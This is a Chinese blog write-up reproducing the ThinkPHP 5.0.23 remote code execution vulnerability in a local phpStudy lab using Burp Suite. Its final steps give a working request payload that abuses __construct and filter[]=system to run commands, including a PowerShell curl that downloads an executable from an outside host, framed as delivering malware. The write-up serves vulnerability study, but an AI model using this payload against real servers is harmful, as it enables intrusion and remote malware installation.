首页 > 编程语言 >记一次Thinkphp5.0.23复现过程

记一次Thinkphp5.0.23复现过程

时间:2023-08-13 22:01:42浏览次数:46  
标签:解压 exe 23 之后 phpstudy thinkphp5.0 复现 Thinkphp5.0

环境 : Windows11专业版 22H2

工具:phpStudy2018、thinkphp5.0.23、burp专业版、Firefox浏览器

说明:一开始是打算使用linux中的docker上搭建靶场的 奈何因为dockerhub是国外的 弄了一天没拉取下来包 只好去gitee把这个包下载下来使用win平台自己搭建一下了

1.安装phpstudy2018 和 下载 thinkphp镜像

thinkphp5.0.23:https://gitee.com/sysorem-lee/thinkphp_5.0.23_with_extend

phpstudy2018:https://txsb.lanzouq.com/iS0yu15a5nwh

2.配置环境

 (1).得到这个PhpStudy包之后解压出来 解压出来之后双击运行 PhpStudy.exe自解压程序 解压目标文件夹默认即可

 (2).解压出来之后打开你解压的文件夹

(3).点进去\PHPTutorial这个文件夹内找到WWW,然后把克隆之后的thinkphp5.0.23压缩包解压到这里

(4).转到phpstudy目录 打开里面的phpstudy.exe可执行文件

(5).打开phpstudy.exe之后点击启动,绿点亮了就是启动成功了

 3.检查环境

 (1).浏览器输入这个这个地址 出现以下页面证明已经开启成功了!

4.测试漏洞

 (1).打开bp抓包工具 设置好代理 开始测试src漏洞

(2).开启浏览器代理之后运行网址

 (3).之后查看bp的Proxy 里面的 intercept 会出现一个这样的包:

 (ps:在burp里面是默认开启抓包的)

(4)右键这个包选择发送到Repeater 并且右键选择更改请求方式为 POST

 (5).在请求方式段添加以下代码/index.php?s=captcha 如图所示

 (6).添加必要参数 

 (ps:切记 在参数下面不能有多余的回车符)

(7).点击GO || Send在右侧可以往下找看到显示出来了当前平台用户名 

5.利用此src漏洞 实现远程下载恶意软件 此处用迅雷安装包代替

(1).参数改为:_method=__construct&filter[]=system&method=get&server[REQUEST_METHOD]=powershell curl -o "xunlei.exe" "https://xmp.down.sandai.net/xmp/XMPSetup6.1.7.810xmpdl.exe" 之后 点击GO || Send 火绒出现警告 允许即可

 (2).之后在public目录里看到迅雷的安装包以及被下载下来了 下载速度取决于你的网速

 6.至此 thinkphp5.0.23 漏洞复现完成

标签:解压,exe,23,之后,phpstudy,thinkphp5.0,复现,Thinkphp5.0
From: https://www.cnblogs.com/Cococop/p/17627324.html

相关文章

  • 2023牛客暑期多校训练营7 CGILM
    比赛链接C题解知识点:位运算,贪心。我们用分段的思想考虑大小关系,若在同一段则大小不能确定,一开始为\([1,n]\)。我们按位从高到低考虑,某位如果\(b_i\)产生了\(1\),那么会这一位的第\(i\)个数产生大小的分段,得到\([1,i-1]<[i,n]\),之后这两段的大小关系就确定了,我们可以......
  • Day1 - 2023/08/13
    B-BaseK(atcoder.jp)题意:给你两个$K$进制数$A$和$B$,将其转化为十进制,并输出二者的乘积。思路:低位往高位的权重依次为$K^0,K^1,\cdot\cdot\cdotK^n$,若这一位是$1$,就把权重累加起来,最后计算乘积即可。代码:#include<bits/stdc++.h>#defineL(i,j,......
  • UOI 2023 An Array And Addition Again
    传送门:https://uoi2023-2.eolymp.io/problems/3题目大纲:给予一个整数n。(n<=1e18)你现在有一个数组a,a的所有号码为0除了a[100]为1你需要给一些指令,每一个指令需要一个整数s,他会进行d[s]+=d[s+1]你需要找到一串指令使得d[1]=n输出指令的长度:然后每个指......
  • 2023年多校联训NOIP层测试7+【LGR-149-Div.3】洛谷基础赛 #2 & qw Round -1
    2023年多校联训NOIP层测试7,集训欢乐赛,绝对欢乐,童叟无欺赛时在回家的路上+睡觉,所以没打。\(T1\)近似ybtOJ2049:【例5.19】字符串判等本题少了对空格的判断,水题。PS:题面和题解中都写了文件输入输出,测评时没有文件输入输出是几个意思,艹。#include<bits/stdc++.h>usingname......
  • 【愚公系列】2023年08月 攻防世界-Web(ics-02)
    (文章目录)前言SSRF(服务器端请求伪造)是一种攻击技术,攻击者通过构造恶意请求,欺骗服务器发起外部请求,获取服务器本应该不被直接访问的信息或服务。攻击者可利用SSRF进行一系列攻击,包括对内部资源进行扫描、窃取敏感信息、攻击内部系统等。SQL注入是一种常见的Web攻击技术,攻......
  • Nepctf2023 Review 出题思路及WP
    原设计图Flag格式NepCTF{%s}逻辑复原mainUPX拆壳,main函数逻辑复原得到getInputcheckInputFormatdebuggerCheck如果存在,则加密一些数据cotIsDebuggerPresent++checkCRCcheckBreakPoint1checkBreakPoint2thread3FinalCheckcheckCRCCRCcheckcotCRCcheck++c......
  • 暑假牛客多校第八场 2023-8-11(H、K)
    H.Insert1,Insert2,Insert3,...算法:栈做法:   我们分析题目发现每个区间的左端点一定是\(1\),而且每个新加入的数\(x\)一定是匹配最靠近它的且未经匹配的\(x-1\)。举个例子,在[1,1,2,2,3]中我们加入一个数\(3\)时由于从左到右的第二个\(2\)是已经和第一个......
  • Adobe After Effects 2023 v23.5 (macOS, Windows) - 后期特效
    AdobeAfterEffects2023v23.5(macOS,Windows)-后期特效Acrobat、AfterEffects、Animate、Audition、Bridge、CharacterAnimator、Dimension、Dreamweaver、Illustrator、InCopy、InDesign、LightroomClassic、MediaEncoder、Photoshop、PremierePro、AdobeXD请访......
  • Burp Suite Professional / Community 2023.9 (macOS, Linux, Windows) - Web 应用安
    BurpSuiteProfessional/Community2023.9(macOS,Linux,Windows)-Web应用安全、测试和扫描BurpSuiteProfessional,Test,find,andexploitvulnerabilities.请访问原文链接:https://sysin.org/blog/burp-suite-pro-2023/,查看最新版。原创作品,转载请保留出处。作者......
  • Adobe Premiere Pro 2023 v23.5 (macOS, Windows) - 专业视频编辑软件
    AdobePremierePro2023v23.5(macOS,Windows)-专业视频编辑软件Acrobat、AfterEffects、Animate、Audition、Bridge、CharacterAnimator、Dimension、Dreamweaver、Illustrator、InCopy、InDesign、LightroomClassic、MediaEncoder、Photoshop、PremierePro、Adobe......